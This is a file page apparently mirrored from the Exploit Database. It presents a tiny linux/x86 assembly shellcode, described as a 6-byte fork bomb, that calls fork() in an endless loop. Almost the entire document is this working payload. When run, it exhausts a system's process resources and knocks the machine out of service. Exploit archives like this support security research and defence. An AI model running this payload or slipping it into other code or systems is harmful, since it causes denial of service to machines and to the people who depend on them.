exploit-db-mirror/platforms/lin_x86/shellcode/13578.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

16 lines
210 B
Text
Executable file

Smallest fork bomb shellcode I could make.
; linux/x86 fork bomb 6 bytes
; root@thegibson
; 2009-12-30
section .text
global _start
_start:
; fork()
mov al, 2
int 0x80
jmp short _start